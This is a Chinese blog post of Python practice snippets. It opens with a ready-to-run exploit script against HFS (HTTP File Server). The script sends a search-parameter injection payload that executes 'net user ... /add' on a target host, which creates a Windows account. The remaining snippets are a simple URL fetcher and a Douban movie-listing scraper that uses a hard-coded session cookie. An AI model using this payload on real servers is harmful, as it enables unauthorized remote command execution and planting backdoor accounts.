python安全开发-rce命令执行&请求测试&豆 ban的信息爬取


## 0x00 HFS的命令执行

import requests
url_add="/?search==%00{.exec|cmd%20/c%20net%20user%20bbbbb%20123%20/add.}"
url="http://192.168.213.163/"

urls=url+url_add
print(urls)

def add():
    code=requests.get(urls).status_code
    if code ==200:
        print("yes+urls")
    else:
        print("no+urls")

if __name__ == '__main__':
    add()

0x01 简单的请求测试

import requests
url=input("请输入url:")

def duqu():
    code=requests.get(url).text
    print(code)

if __name__ == '__main__':
    duqu()

0x02 dou ban的标签属性爬取 lxml库 实体化的使用

import requests
url=input("请输入url:")

def duqu():
    code=requests.get(url).text
    print(code)

if __name__ == '__main__':
    duqu()

豆b的标签属性爬取  lxml库  实体化的使用
from webbrowser import Mozilla
import requests
from lxml import etree
url="https://movie.douban.com/cinema/nowplaying/wuhan/"
header={
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
}
cookie={
        "Cookie": "bid=5E7Szdkr4iY; _pk_id.100001.4cf6=d33e98bf6d013b86.1650962744.1.1650962744.1650962744.; _pk_ses.100001.4cf6=*; ap_v=0,6.0; __utma=30149280.121615322.1650962745.1650962745.1650962745.1; __utmb=30149280.0.10.1650962745; __utmc=30149280; __utmz=30149280.1650962745.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=223695111.244269144.1650962745.1650962745.1650962745.1; __utmb=223695111.0.10.1650962745; __utmc=223695111; __utmz=223695111.1650962745.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)""Cache-Control"
}
cookies={}
resp=requests.get(url,headers=header,cookies=cookie).text
#print(resp)
m=etree.HTML(resp)
ul=m.xpath("//ul[@class='lists']")[0]
li=ul.xpath("./li")
for lis in li:
        title=lis.xpath("@data-title")[0]
        dura=lis.xpath("@data-duration")[0]
        print(title+'|'+dura)

文章作者: 告白
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 告白 !
  目录